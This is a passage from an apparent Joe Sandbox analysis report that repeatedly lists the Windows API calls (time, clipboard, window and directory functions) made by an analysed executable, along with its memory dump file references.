      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00436CF0: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 00436D69
      • Part of subcall function 00436CF0: GetProcAddress.KERNEL32(00000000), ref: 00436D70
      • Part of subcall function 00436CF0: GetSystemMetrics.USER32(00000000), ref: 00436D9B
      • Part of subcall function 00436CF0: GetSystemMetrics.USER32(00000000), ref: 00436FA4
      • Part of subcall function 00436CF0: GetSystemMetrics.USER32(00000001), ref: 00436FAC
      • Part of subcall function 00436CF0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00436FBC
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043ED30: SetCurrentDirectoryA.KERNEL32(004987E9), ref: 0043ED3E
      • Part of subcall function 0043ED30: GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 0043ED7D
      • Part of subcall function 0043ED30: SetCurrentDirectoryA.KERNEL32(?), ref: 0043EDBA
      • Part of subcall function 0043ED30: GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 0043EDC6
      • Part of subcall function 0043ED30: _strncpy.LIBCMT ref: 0043EDD3
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043C070: __Stoull.NTSTC_LIBCMT ref: 0043C220
      • Part of subcall function 0043C070: IsClipboardFormatAvailable.USER32(00000001), ref: 0043C823
      • Part of subcall function 0043C070: IsClipboardFormatAvailable.USER32(0000000F), ref: 0043C82B
      • Part of subcall function 0043C070: lstrcmpi.KERNEL32(?,00000000), ref: 0043C991
      • Part of subcall function 0043C070: IsClipboardFormatAvailable.USER32(00000001), ref: 0043CA72
      • Part of subcall function 0043C070: IsClipboardFormatAvailable.USER32(0000000F), ref: 0043CA7A
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043FC00: GetCPInfo.KERNEL32(000004E4,?,?,?,?,?,?,?,004987E9), ref: 0043FCEF
      • Part of subcall function 0043FC00: GetLastError.KERNEL32(0000030C,?,?,?,?,?,?,004987E9), ref: 0043FD39
      • Part of subcall function 0043FC00: GetTickCount.KERNEL32(?,0000FFFF,00000001,0000030C,?,?,?,?,?,?,004987E9), ref: 0043FDB1
      • Part of subcall function 0043FC00: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0043FDD8
      • Part of subcall function 0043FC00: GetTickCount.KERNEL32(?,?,?,?,?,?,004987E9), ref: 0043FDEE
      • Part of subcall function 0043FC00: GetLastError.KERNEL32(?,0000FFFF,00000001,0000030C,?,?,?,?,?,?,004987E9), ref: 0043FE14
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
      • Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
      • Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
      • Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
      • Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
      • Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
      • Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
      • Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
      • Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043D270: _strncpy.LIBCMT ref: 0043D2B9
      • Part of subcall function 0043D270: SetVolumeLabelA.KERNEL32(?,?), ref: 0043D303
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
